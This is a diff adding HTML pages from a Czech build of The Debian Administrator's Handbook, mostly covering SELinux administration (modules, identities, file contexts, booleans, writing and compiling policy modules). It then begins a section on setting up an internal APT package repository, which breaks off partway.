+              class="emphasis"><em>permissive</em></span> mode where denied actions are logged but still executed. You should thus modify the GRUB bootloader configuration file to append the desired parameters. One easy way to do this is to modify the <code
+              class="literal">GRUB_CMDLINE_LINUX</code> variable in <code
+              class="filename">/etc/default/grub</code> and to run <code
+              class="command">update-grub</code>. SELinux will be active after a reboot.
+			</div><div
+            class="para">
+				It is worth noting that the <code
+              class="command">selinux-activate</code> script automates those operations and forces a labeling on next boot (which avoids new non-labeled files created while SELinux was not yet active and while the labeling was going on).
+			</div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.selinux-management"></a>14.5.3. Managing an SELinux System</h3></div></div></div><a
+            id="id-1.17.8.5.2"
+            class="indexterm"></a><a
+            id="id-1.17.8.5.3"
+            class="indexterm"></a><div
+            class="para">
+				The SELinux policy is a modular set of rules, and its installation detects and enables automatically all the relevant modules based on the already installed services. The system is thus immediately operational. However, when a service is installed after the SELinux policy, you must be able to manually enable the corresponding module. That is the purpose of the <code
+              class="command">semodule</code> command. Furthermore, you must be able to define the roles that each user can endorse, and this can be done with the <code
+              class="command">semanage</code> command.
+			</div><div
+            class="para">
+				Those two commands can thus be used to modify the current SELinux configuration, which is stored in <code
+              class="filename">/etc/selinux/default/</code>. Unlike other configuration files that you can find in <code
+              class="filename">/etc/</code>, all those files must not be changed by hand. You should use the programs designed for this purpose.
+			</div><div
+            class="sidebar"><div
+              class="titlepage"><div><div><p
+                    class="title"><strong><span
+                        class="emphasis"><em>GOING FURTHER</em></span> More documentation</strong></p></div></div></div><div
+              class="para">
+				Since the NSA doesn't provide any official documentation, the community set up a wiki to compensate. It brings together a lot of information, but you must be aware that most SELinux contributors are Fedora users (where SELinux is enabled by default). The documentation thus tends to deal specifically with that distribution. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://www.selinuxproject.org">http://www.selinuxproject.org</a></div>
+			</div><div
+              class="para">
+				You should also have a look at the dedicated Debian wiki page as well as Russell Coker's blog, who is one of the most active Debian developers working on SELinux support. <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://wiki.debian.org/SELinux">http://wiki.debian.org/SELinux</a></div> <div
+                xmlns=""
+                class="url">→ <a
+                  xmlns="http://www.w3.org/1999/xhtml"
+                  href="http://etbe.coker.com.au/tag/selinux/">http://etbe.coker.com.au/tag/selinux/</a></div>
+			</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.17.8.5.7"></a>14.5.3.1. Managing SELinux Modules</h4></div></div></div><div
+              class="para">
+					Available SELinux modules are stored in the <code
+                class="filename">/usr/share/selinux/default/</code> directory. To enable one of these modules in the current configuration, you should use <code
+                class="command">semodule -i <em
+                  class="replaceable">module.pp.bz2</em></code>. The <span
+                class="emphasis"><em>pp.bz2</em></span> extension stands for <span
+                class="emphasis"><em>policy package</em></span> (compressed with bzip2).
+				</div><div
+              class="para">
+					Removing a module from the current configuration is done with <code
+                class="command">semodule -r <em
+                  class="replaceable">module</em></code>. Finally, the <code
+                class="command">semodule -l</code> command lists the modules which are currently installed. It also outputs their version numbers. Modules can be selectively enabled with <code
+                class="command">semodule -e</code> and disabled with <code
+                class="command">semodule -d</code>.
+				</div><pre
+              class="screen"><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>semodule -i /usr/share/selinux/default/abrt.pp.bz2</code></strong>
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>semodule -l</code></strong>
+<code
+                class="computeroutput">abrt    1.5.0   Disabled
+accountsd       1.1.0   
+acct    1.6.0   
+[...]</code>
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>semodule -e abrt</code></strong>
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>semodule -d accountsd</code></strong>
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>semodule -l</code></strong>
+<code
+                class="computeroutput">abrt    1.5.0
+accountsd       1.1.0   Disabled
+acct    1.6.0   
+[...]</code>
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>semodule -r abrt</code></strong>
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>semodule -l</code></strong>
+<code
+                class="computeroutput">accountsd       1.1.0   Disabled
+acct    1.6.0   
+[...]</code></pre><div
+              class="para">
+					<code
+                class="command">semodule</code> immediately loads the new configuration unless you use its <code
+                class="literal">-n</code> option. It is worth noting that the program acts by default on the current configuration (which is indicated by the <code
+                class="literal">SELINUXTYPE</code> variable in <code
+                class="filename">/etc/selinux/config</code>), but that you can modify another one by specifying it with the <code
+                class="literal">-s</code> option.
+				</div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.17.8.5.8"></a>14.5.3.2. Managing Identities</h4></div></div></div><div
+              class="para">
+					Every time that a user logs in, they get assigned an SELinux identity. This identity defines the roles that they will be able to endorse. Those two mappings (from the user to the identity and from this identity to roles) are configurable with the <code
+                class="command">semanage</code> command.
+				</div><div
+              class="para">
+					You should definitely read the <span
+                class="citerefentry"><span
+                  class="refentrytitle">semanage</span>(8)</span> manual page, even if the command's syntax tends to be similar for all the concepts which are managed. You will find common options to all sub-commands: <code
+                class="literal">-a</code> to add, <code
+                class="literal">-d</code> to delete, <code
+                class="literal">-m</code> to modify, <code
+                class="literal">-l</code> to list, and <code
+                class="literal">-t</code> to indicate a type (or domain).
+				</div><div
+              class="para">
+					<code
+                class="command">semanage login -l</code> lists the current mapping between user identifiers and SELinux identities. Users that have no explicit entry get the identity indicated in the <code
+                class="literal">__default__</code> entry. The <code
+                class="command">semanage login -a -s user_u <em
+                  class="replaceable">user</em></code> command will associate the <span
+                class="emphasis"><em>user_u</em></span> identity to the given user. Finally, <code
+                class="command">semanage login -d <em
+                  class="replaceable">user</em></code> drops the mapping entry assigned to this user.
+				</div><pre
+              class="screen"><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>semanage login -a -s user_u rhertzog</code></strong>
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>semanage login -l</code></strong>
+<code
+                class="computeroutput">
+Login Name           SELinux User         MLS/MCS Range        Service
+
+__default__          unconfined_u         SystemLow-SystemHigh *
+rhertzog             user_u               SystemLow            *
+root                 unconfined_u         SystemLow-SystemHigh *
+system_u             system_u             SystemLow-SystemHigh *
+# </code><strong
+                class="userinput"><code>semanage login -d rhertzog</code></strong></pre><div
+              class="para">
+					<code
+                class="command">semanage user -l</code> lists the mapping between SELinux user identities and allowed roles. Adding a new identity requires to define both the corresponding roles and a labeling prefix which is used to assign a type to personal files (<code
+                class="filename">/home/<em
+                  class="replaceable">user</em>/*</code>). The prefix must be picked among <code
+                class="literal">user</code>, <code
+                class="literal">staff</code>, and <code
+                class="literal">sysadm</code>. The “<code
+                class="literal">staff</code>” prefix results in files of type “<code
+                class="literal">staff_home_dir_t</code>”. Creating a new SELinux user identity is done with <code
+                class="command">semanage user -a -R <em
+                  class="replaceable">roles</em> -P <em
+                  class="replaceable">prefix</em> <em
+                  class="replaceable">identity</em></code>. Finally, you can remove an SELinux user identity with <code
+                class="command">semanage user -d <em
+                  class="replaceable">identity</em></code>.
+				</div><pre
+              class="screen"><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>semanage user -a -R 'staff_r user_r' -P staff test_u</code></strong>
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>semanage user -l</code></strong>
+<code
+                class="computeroutput">
+                Labeling   MLS/       MLS/                          
+SELinux User    Prefix     MCS Level  MCS Range             SELinux Roles
+
+root            sysadm     SystemLow  SystemLow-SystemHigh  staff_r sysadm_r system_r
+staff_u         staff      SystemLow  SystemLow-SystemHigh  staff_r sysadm_r
+sysadm_u        sysadm     SystemLow  SystemLow-SystemHigh  sysadm_r
+system_u        user       SystemLow  SystemLow-SystemHigh  system_r
+test_u          staff      SystemLow  SystemLow             staff_r user_r
+unconfined_u    unconfined SystemLow  SystemLow-SystemHigh  system_r unconfined_r
+user_u          user       SystemLow  SystemLow             user_r
+# </code><strong
+                class="userinput"><code>semanage user -d test_u</code></strong></pre></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.17.8.5.9"></a>14.5.3.3. Managing File Contexts, Ports and Booleans</h4></div></div></div><div
+              class="para">
+					Each SELinux module provides a set of file labeling rules, but it is also possible to add custom labeling rules to cater to a specific case. For example, if you want the web server to be able to read files within the <code
+                class="filename">/srv/www/</code> file hierarchy, you could execute <code
+                class="command">semanage fcontext -a -t httpd_sys_content_t "/srv/www(/.*)?"</code> followed by <code
+                class="command">restorecon -R /srv/www/</code>. The former command registers the new labeling rules and the latter resets the file types according to the current labeling rules.
+				</div><div
+              class="para">
+					Similarly, TCP/UDP ports are labeled in a way that ensures that only the corresponding daemons can listen to them. For instance, if you want the web server to be able to listen on port 8080, you should run <code
+                class="command">semanage port -m -t http_port_t -p tcp 8080</code>.
+				</div><div
+              class="para">
+					Some SELinux modules export boolean options that you can tweak to alter the behavior of the default rules. The <code
+                class="command">getsebool</code> utility can be used to inspect those options (<code
+                class="command">getsebool <em
+                  class="replaceable">boolean</em></code> displays one option, and <code
+                class="command">getsebool -a</code> them all). The <code
+                class="command">setsebool <em
+                  class="replaceable">boolean</em> <em
+                  class="replaceable">value</em></code> command changes the current value of a boolean option. The <code
+                class="literal">-P</code> option makes the change permanent, it means that the new value becomes the default and will be kept across reboots. The example below grants web servers an access to home directories (this is useful when users have personal websites in <code
+                class="filename">~/public_html/</code>).
+				</div><pre
+              class="screen"><code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>getsebool httpd_enable_homedirs</code></strong>
+<code
+                class="computeroutput">httpd_enable_homedirs --&gt; off
+# </code><strong
+                class="userinput"><code>setsebool -P httpd_enable_homedirs on</code></strong>
+<code
+                class="computeroutput"># </code><strong
+                class="userinput"><code>getsebool httpd_enable_homedirs</code></strong> 
+<code
+                class="computeroutput">httpd_enable_homedirs --&gt; on</code></pre></div></div><div
+          class="section"><div
+            class="titlepage"><div><div><h3
+                  class="title"><a
+                    xmlns=""
+                    id="sect.selinux-custom-rules"></a>14.5.4. Adapting the Rules</h3></div></div></div><div
+            class="para">
+				Since the SELinux policy is modular, it might be interesting to develop new modules for (possibly custom) applications that lack them. These new modules will then complete the <span
+              class="emphasis"><em>reference policy</em></span>.
+			</div><div
+            class="para">
+				To create new modules, the <span
+              class="pkg pkg">selinux-policy-dev</span> package is required, as well as <span
+              class="pkg pkg">selinux-policy-doc</span>. The latter contains the documentation of the standard rules (<code
+              class="filename">/usr/share/doc/selinux-policy-doc/html/</code>) and sample files that can be used as templates to create new modules. Install those files and study them more closely:
+			</div><pre
+            class="screen"><code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>cp /usr/share/doc/selinux-policy-doc/Makefile.example Makefile</code></strong>
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>cp /usr/share/doc/selinux-policy-doc/example.fc ./</code></strong>
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>cp /usr/share/doc/selinux-policy-doc/example.if ./</code></strong>
+<code
+              class="computeroutput">$ </code><strong
+              class="userinput"><code>cp /usr/share/doc/selinux-policy-doc/example.te ./</code></strong></pre><div
+            class="para">
+				The <code
+              class="filename">.te</code> file is the most important one. It defines the rules. The <code
+              class="filename">.fc</code> file defines the “file contexts”, that is the types assigned to files related to this module. The data within the <code
+              class="filename">.fc</code> file are used during the file labeling step. Finally, the <code
+              class="filename">.if</code> file defines the interface of the module: it is a set of “public functions” that other modules can use to properly interact with the module that you're creating.
+			</div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.17.8.6.6"></a>14.5.4.1. Writing a <code
+                      class="filename">.fc</code> file</h4></div></div></div><div
+              class="para">
+					Reading the below example should be sufficient to understand the structure of such a file. You can use regular expressions to assign the same security context to multiple files, or even an entire directory tree.
+				</div><div
+              class="example"><a
+                xmlns=""
+                id="id-1.17.8.6.6.3"></a><p
+                class="title"><strong>Příklad 14.2. <code
+                    class="filename">example.fc</code> file</strong></p><div
+                class="example-contents"><pre
+                  class="programlisting scale"># myapp executable will have:
+# label: system_u:object_r:myapp_exec_t
+# MLS sensitivity: s0
+# MCS categories: &lt;none&gt;
+
+/usr/sbin/myapp         --      gen_context(system_u:object_r:myapp_exec_t,s0)
+</pre></div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.17.8.6.7"></a>14.5.4.2. Writing a <code
+                      class="filename">.if</code> File</h4></div></div></div><div
+              class="para">
+					In the sample below, the first interface (“<code
+                class="literal">myapp_domtrans</code>”) controls who can execute the application. The second one (“<code
+                class="literal">myapp_read_log</code>”) grants read rights on the application's log files.
+				</div><div
+              class="para">
+					Each interface must generate a valid set of rules which can be embedded in a <code
+                class="filename">.te</code> file. You should thus declare all the types that you use (with the <code
+                class="literal">gen_require</code> macro), and use standard directives to grant rights. Note, however, that you can use interfaces provided by other modules. The next section will give more explanations about how to express those rights.
+				</div><div
+              class="example"><a
+                xmlns=""
+                id="id-1.17.8.6.7.4"></a><p
+                class="title"><strong>Příklad 14.3. <code
+                    class="filename">example.if</code> File</strong></p><div
+                class="example-contents"><pre
+                  class="programlisting">## &lt;summary&gt;Myapp example policy&lt;/summary&gt;
+## &lt;desc&gt;
+##      &lt;p&gt;
+##              More descriptive text about myapp.  The &lt;desc&gt;
+##              tag can also use &lt;p&gt;, &lt;ul&gt;, and &lt;ol&gt;
+##              html tags for formatting.
+##      &lt;/p&gt;
+##      &lt;p&gt;
+##              This policy supports the following myapp features:
+##              &lt;ul&gt;
+##              &lt;li&gt;Feature A&lt;/li&gt;
+##              &lt;li&gt;Feature B&lt;/li&gt;
+##              &lt;li&gt;Feature C&lt;/li&gt;
+##              &lt;/ul&gt;
+##      &lt;/p&gt;
+## &lt;/desc&gt;
+#
+
+########################################
+## &lt;summary&gt;
+##      Execute a domain transition to run myapp.
+## &lt;/summary&gt;
+## &lt;param name="domain"&gt;
+##      Domain allowed to transition.
+## &lt;/param&gt;
+#
+interface(`myapp_domtrans',`
+        gen_require(`
+                type myapp_t, myapp_exec_t;
+        ')
+
+        domtrans_pattern($1,myapp_exec_t,myapp_t)
+')
+
+########################################
+## &lt;summary&gt;
+##      Read myapp log files.
+## &lt;/summary&gt;
+## &lt;param name="domain"&gt;
+##      Domain allowed to read the log files.
+## &lt;/param&gt;
+#
+interface(`myapp_read_log',`
+        gen_require(`
+                type myapp_log_t;
+        ')
+
+        logging_search_logs($1)
+        allow $1 myapp_log_t:file r_file_perms;
+')
+</pre></div></div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>DOCUMENTATION</em></span> Explanations about the <span
+                          class="emphasis"><em>reference policy</em></span></strong></p></div></div></div><div
+                class="para">
+					The <span
+                  class="emphasis"><em>reference policy</em></span> evolves like any free software project: based on volunteer contributions. The project is hosted by Tresys, one of the most active companies in the SELinux field. Their wiki contains explanations on how the rules are structured and how you can create new ones. <div
+                  xmlns=""
+                  class="url">→ <a
+                    xmlns="http://www.w3.org/1999/xhtml"
+                    href="https://github.com/TresysTechnology/refpolicy/wiki/GettingStarted">https://github.com/TresysTechnology/refpolicy/wiki/GettingStarted</a></div>
+				</div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="sect.writing-a-te-file"></a>14.5.4.3. Writing a <code
+                      class="filename">.te</code> File</h4></div></div></div><div
+              class="para">
+					Have a look at the <code
+                class="filename">example.te</code> file:
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>GOING FURTHER</em></span> The <code
+                          class="command">m4</code> macro language</strong></p></div></div></div><div
+                class="para">
+					To properly structure the policy, the SELinux developers used a macro-command processor. Instead of duplicating many similar <span
+                  class="emphasis"><em>allow</em></span> directives, they created “macro functions” to use a higher-level logic, which also results in a much more readable policy.
+				</div><div
+                class="para">
+					In practice, <code
+                  class="command">m4</code> is used to compile those rules. It does the opposite operation: it expands all those high-level directives into a huge database of <span
+                  class="emphasis"><em>allow</em></span> directives.
+				</div><div
+                class="para">
+					The SELinux “interfaces” are only macro functions which will be substituted by a set of rules at compilation time. Likewise, some rights are in fact sets of rights which are replaced by their values at compilation time.
+				</div></div><pre
+              class="programlisting">policy_module(myapp,1.0.0) <span
+                id="example.te.module"><img
+                  class="callout"
+                  src="Common_Content/images/1.png"
+                  alt="1" /></span>
+
+########################################
+#
+# Declarations
+#
+
+type myapp_t; <span
+                id="example.te.type"><img
+                  class="callout"
+                  src="Common_Content/images/2.png"
+                  alt="2" /></span>
+type myapp_exec_t;
+domain_type(myapp_t)
+domain_entry_file(myapp_t, myapp_exec_t) <span
+                id="example.te.domain"><img
+                  class="callout"
+                  src="Common_Content/images/3.png"
+                  alt="3" /></span>
+
+type myapp_log_t;
+logging_log_file(myapp_log_t) <span
+                id="example.te.interface"><img
+                  class="callout"
+                  src="Common_Content/images/4.png"
+                  alt="4" /></span>
+
+type myapp_tmp_t;
+files_tmp_file(myapp_tmp_t)
+
+########################################
+#
+# Myapp local policy
+#
+
+allow myapp_t myapp_log_t:file { read_file_perms append_file_perms }; <span
+                id="example.te.allow"><img
+                  class="callout"
+                  src="Common_Content/images/5.png"
+                  alt="5" /></span>
+
+allow myapp_t myapp_tmp_t:file manage_file_perms;
+files_tmp_filetrans(myapp_t,myapp_tmp_t,file)
+</pre><div
+              class="calloutlist"><table
+                border="0"
+                summary="Callout list"><tr><td
+                    width="5%"
+                    valign="top"
+                    align="left"><p><a
+                        href="#example.te.module"><img
+                          class="callout"
+                          src="Common_Content/images/1.png"
+                          alt="1" /></a> </p></td><td
+                    valign="top"
+                    align="left"><div
+                      class="para">
+							The module must be identified by its name and version number. This directive is required.
+						</div></td></tr><tr><td
+                    width="5%"
+                    valign="top"
+                    align="left"><p><a
+                        href="#example.te.type"><img
+                          class="callout"
+                          src="Common_Content/images/2.png"
+                          alt="2" /></a> </p></td><td
+                    valign="top"
+                    align="left"><div
+                      class="para">
+							If the module introduces new types, it must declare them with directives like this one. Do not hesitate to create as many types as required rather than granting too many useless rights.
+						</div></td></tr><tr><td
+                    width="5%"
+                    valign="top"
+                    align="left"><p><a
+                        href="#example.te.domain"><img
+                          class="callout"
+                          src="Common_Content/images/3.png"
+                          alt="3" /></a> </p></td><td
+                    valign="top"
+                    align="left"><div
+                      class="para">
+							Those interfaces define the <code
+                        class="literal">myapp_t</code> type as a process domain that should be used by any executable labeled with <code
+                        class="literal">myapp_exec_t</code>. Implicitly, this adds an <code
+                        class="literal">exec_type</code> attribute on those objects, which in turn allows other modules to grant rights to execute those programs: for instance, the <code
+                        class="literal">userdomain</code> module allows processes with domains <code
+                        class="literal">user_t</code>, <code
+                        class="literal">staff_t</code>, and <code
+                        class="literal">sysadm_t</code> to execute them. The domains of other confined applications will not have the rights to execute them, unless the rules grant them similar rights (this is the case, for example, of <code
+                        class="command">dpkg</code> with its <code
+                        class="literal">dpkg_t</code> domain).
+						</div></td></tr><tr><td
+                    width="5%"
+                    valign="top"
+                    align="left"><p><a
+                        href="#example.te.interface"><img
+                          class="callout"
+                          src="Common_Content/images/4.png"
+                          alt="4" /></a> </p></td><td
+                    valign="top"
+                    align="left"><div
+                      class="para">
+							<code
+                        class="literal">logging_log_file</code> is an interface provided by the reference policy. It indicates that files labeled with the given type are log files which ought to benefit from the associated rules (for example granting rights to <code
+                        class="command">logrotate</code> so that it can manipulate them).
+						</div></td></tr><tr><td
+                    width="5%"
+                    valign="top"
+                    align="left"><p><a
+                        href="#example.te.allow"><img
+                          class="callout"
+                          src="Common_Content/images/5.png"
+                          alt="5" /></a> </p></td><td
+                    valign="top"
+                    align="left"><div
+                      class="para">
+							The <code
+                        class="literal">allow</code> directive is the base directive used to authorize an operation. The first parameter is the process domain which is allowed to execute the operation. The second one defines the object that a process of the former domain can manipulate. This parameter is of the form “<em
+                        class="replaceable">type</em>:<em
+                        class="replaceable">class</em>“ where <em
+                        class="replaceable">type</em> is its SELinux type and <em
+                        class="replaceable">class</em> describes the nature of the object (file, directory, socket, fifo, etc.). Finally, the last parameter describes the permissions (the allowed operations).
+						</div><div
+                      class="para">
+							Permissions are defined as the set of allowed operations and follow this template: <code
+                        class="literal">{ <em
+                          class="replaceable">operation1</em> <em
+                          class="replaceable">operation2</em> }</code>. However, you can also use macros representing the most useful permissions. The <code
+                        class="filename">/usr/share/selinux/devel/include/support/obj_perm_sets.spt</code> lists them.
+						</div><div
+                      class="para">
+							The following web page provides a relatively exhaustive list of object classes, and permissions that can be granted. <div
+                        xmlns=""
+                        class="url">→ <a
+                          xmlns="http://www.w3.org/1999/xhtml"
+                          href="http://www.selinuxproject.org/page/ObjectClassesPerms">http://www.selinuxproject.org/page/ObjectClassesPerms</a></div>
+						</div></td></tr></table></div><div
+              class="para">
+					Now you just have to find the minimal set of rules required to ensure that the target application or service works properly. To achieve this, you should have a good knowledge of how the application works and of what kind of data it manages and/or generates.
+				</div><div
+              class="para">
+					However, an empirical approach is possible. Once the relevant objects are correctly labeled, you can use the application in permissive mode: the operations that would be forbidden are logged but still succeed. By analyzing the logs, you can now identify the operations to allow. Here is an example of such a log entry:
+				</div><pre
+              class="programlisting">avc:  denied  { read write } for  pid=1876 comm="syslogd" name="xconsole" dev=tmpfs ino=5510 scontext=system_u:system_r:syslogd_t:s0 tcontext=system_u:object_r:device_t:s0 tclass=fifo_file permissive=1
+</pre><div
+              class="para">
+					To better understand this message, let us study it piece by piece.
+				</div><div
+              class="table"><a
+                xmlns=""
+                id="id-1.17.8.6.8.10"></a><p
+                class="title"><strong>Tabulka 14.1. Analysis of an SELinux trace</strong></p><div
+                class="table-contents"><table
+                  xmlns:d="http://docbook.org/ns/docbook"
+                  class="lt-4-cols gt-7-rows"
+                  summary="Analysis of an SELinux trace"><colgroup><col /><col /></colgroup><thead><tr><th>Message</th><th>Description</th></tr></thead><tbody><tr><td> <code
+                          class="computeroutput">avc: denied</code> </td><td>An operation has been denied.</td></tr><tr><td> <code
+                          class="computeroutput">{ read write }</code> </td><td>This operation required the <code
+                          class="literal">read</code> and <code
+                          class="literal">write</code> permissions.</td></tr><tr><td> <code
+                          class="computeroutput">pid=1876</code> </td><td>The process with PID 1876 executed the operation (or tried to execute it).</td></tr><tr><td> <code
+                          class="computeroutput">comm="syslogd"</code> </td><td>The process was an instance of the <code
+                          class="literal">syslogd</code> program.</td></tr><tr><td> <code
+                          class="computeroutput">name="xconsole"</code> </td><td>The target object was named <code
+                          class="literal">xconsole</code>. Sometimes you can also have a “path” variable — with the full path — instead.</td></tr><tr><td> <code
+                          class="computeroutput">dev=tmpfs</code> </td><td>The device hosting the target object is a <code
+                          class="literal">tmpfs</code> (an in-memory filesystem). For a real disk, you could see the partition hosting the object (for example: “sda3”).</td></tr><tr><td> <code
+                          class="computeroutput">ino=5510</code> </td><td>The object is identified by the inode number 5510.</td></tr><tr><td> <code
+                          class="computeroutput">scontext=system_u:system_r:syslogd_t:s0</code> </td><td>This is the security context of the process who executed the operation.</td></tr><tr><td> <code
+                          class="computeroutput">tcontext=system_u:object_r:device_t:s0</code> </td><td>This is the security context of the target object.</td></tr><tr><td> <code
+                          class="computeroutput">tclass=fifo_file</code> </td><td>The target object is a FIFO file.</td></tr></tbody></table></div></div><div
+              class="para">
+					By observing this log entry, it is possible to build a rule that would allow this operation. For example: <code
+                class="literal">allow syslogd_t device_t:fifo_file { read write }</code>. This process can be automated, and it's exactly what the <code
+                class="command">audit2allow</code> command (of the <span
+                class="pkg pkg">policycoreutils</span> package) offers. This approach is only useful if the various objects are already correctly labeled according to what must be confined. In any case, you will have to carefully review the generated rules and validate them according to your knowledge of the application. Effectively, this approach tends to grant more rights than are really required. The proper solution is often to create new types and to grant rights on those types only. It also happens that a denied operation isn't fatal to the application, in which case it might be better to just add a “<code
+                class="literal">dontaudit</code>” rule to avoid the log entry despite the effective denial.
+				</div><div
+              class="sidebar"><div
+                class="titlepage"><div><div><p
+                      class="title"><strong><span
+                          class="emphasis"><em>COMPLEMENTS</em></span> No roles in policy rules</strong></p></div></div></div><a
+                id="id-1.17.8.6.8.12.2"
+                class="indexterm"></a><a
+                id="id-1.17.8.6.8.12.3"
+                class="indexterm"></a><div
+                class="para">
+					It might seem weird that roles do not appear at all when creating new rules. SELinux uses only the domains to find out which operations are allowed. The role intervenes only indirectly by allowing the user to switch to another domain. SELinux is based on a theory known as <span
+                  class="emphasis"><em>Type Enforcement</em></span> and the type is the only element that matters when granting rights.
+				</div></div></div><div
+            class="section"><div
+              class="titlepage"><div><div><h4
+                    class="title"><a
+                      xmlns=""
+                      id="id-1.17.8.6.9"></a>14.5.4.4. Compiling the Files</h4></div></div></div><div
+              class="para">
+					Once the 3 files (<code
+                class="filename">example.if</code>, <code
+                class="filename">example.fc</code>, and <code
+                class="filename">example.te</code>) match your expectations for the new rules, just run <code
+                class="command">make NAME=devel</code> to generate a module in the <code
+                class="filename">example.pp</code> file (you can immediately load it with <code
+                class="command">semodule -i example.pp</code>). If several modules are defined, <code
+                class="command">make</code> will create all the corresponding <code
+                class="filename">.pp</code> files.
+				</div></div></div></div><ul
+        class="docnav"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.apparmor.html"><strong>Předcházející</strong>14.4. Introduction to AppArmor</a></li><li
+          class="up"><a
+            accesskey="u"
+            href="#"><strong>Nahoru</strong></a></li><li
+          class="home"><a
+            accesskey="h"
+            href="index.html"><strong>Domů</strong></a></li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.other-security-considerations.html"><strong>Další</strong>14.6. Other Security-Related Considerations</a></li></ul></body></html>
diff --git a/publish/cs-CZ/Debian/9/html/debian-handbook/sect.setup-apt-package-repository.html b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.setup-apt-package-repository.html
new file mode 100644
index 000000000..3609f62c6
--- /dev/null
+++ b/publish/cs-CZ/Debian/9/html/debian-handbook/sect.setup-apt-package-repository.html
@@ -0,0 +1,231 @@
+<?xml version="1.0" encoding="UTF-8" standalone="no"?>
+<!DOCTYPE html PUBLIC "-//W3C//DTD XHTML 1.0 Strict//EN" "http://www.w3.org/TR/xhtml1/DTD/xhtml1-strict.dtd">
+<html
+    xmlns="http://www.w3.org/1999/xhtml"><head><meta
+        http-equiv="Content-Type"
+        content="text/html; charset=UTF-8" /><title
+        xmlns:d="http://docbook.org/ns/docbook">15.3. Creating a Package Repository for APT</title><link
+        rel="stylesheet"
+        type="text/css"
+        href="Common_Content/css/default.css" /><link
+        rel="stylesheet"
+        media="print"
+        href="Common_Content/css/print.css"
+        type="text/css" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="generator"
+        content="publican v4.3.2" /><meta
+        xmlns:d="http://docbook.org/ns/docbook"
+        name="package"
+        content="Debian-debian-handbook-9-cs-CZ-1.0-1" /><meta
+        name="keywords"
+        content="Backport, Rebuild, Source package, Archive, Meta-package, Debian Developer, Maintainer" /><link
+        rel="home"
+        href="index.html"
+        title="The Debian Administrator's Handbook" /><link
+        rel="up"
+        href="debian-packaging.html"
+        title="Kapitola 15. Creating a Debian Package" /><link
+        rel="prev"
+        href="sect.building-first-package.html"
+        title="15.2. Building your First Package" /><link
+        rel="next"
+        href="sect.becoming-package-maintainer.html"
+        title="15.4. Becoming a Package Maintainer" /><meta
+        xmlns=""
+        name="flattr:id"
+        content="4pz9jq" /><link
+        xmlns=""
+        rel="canonical"
+        href="https://debian-handbook.info/browse/cs-CZ/stable/sect.setup-apt-package-repository.html" /></head><body><div
+        id="banner"><a
+          href="http://debian-handbook.info/get/"><span
+            class="text">Download the ebook</span></a></div><p
+        id="title"><a
+          class="left"
+          href="http://www.debian.org"><img
+            alt="Product Site"
+            src="Common_Content/images//image_left.png" /></a><a
+          class="right"
+          href="index.html"><img
+            alt="Documentation Site"
+            src="Common_Content/images//image_right.png" /></a></p><ul
+        class="docnav top"><li
+          class="previous"><a
+            accesskey="p"
+            href="sect.building-first-package.html"><strong>Předcházející</strong></a></li><li
+          class="home">The Debian Administrator's Handbook</li><li
+          class="next"><a
+            accesskey="n"
+            href="sect.becoming-package-maintainer.html"><strong>Další</strong></a></li></ul><div
+        class="section"><div
+          class="titlepage"><div><div><h2
+                class="title"><a
+                  xmlns=""
+                  id="sect.setup-apt-package-repository"></a>15.3. Creating a Package Repository for APT</h2></div></div></div><a
+          id="id-1.18.6.2"
+          class="indexterm"></a><a
+          id="id-1.18.6.3"
+          class="indexterm"></a><div
+          class="para">
+			Falcot Corp gradually started maintaining a number of Debian packages either locally modified from existing packages or created from scratch to distribute internal data and programs.
+		</div><div
+          class="para">
+			To make deployment easier, they want to integrate these packages in a package archive that can be directly used by APT. For obvious maintenance reasons, they wish to separate internal packages from locally-rebuilt packages. The goal is for the matching entries in a <code
+            class="filename">/etc/apt/sources.list.d/falcot.list</code> file to be as follows:
+		</div><pre
+          class="programlisting">
+deb http://packages.falcot.com/ updates/
+deb http://packages.falcot.com/ internal/
+</pre><a
+          id="id-1.18.6.7"
+          class="indexterm"></a><div
+          class="para">
+			The administrators therefore configure a virtual host on their internal HTTP server, with <code
+            class="filename">/srv/vhosts/packages/</code> as the root of the associated web space. The management of the archive itself is delegated to the <code
+            class="command">mini-dinstall</code> command (in the similarly-named package). This tool keeps an eye on an <code
+            class="filename">incoming/</code> directory (in our case, <code
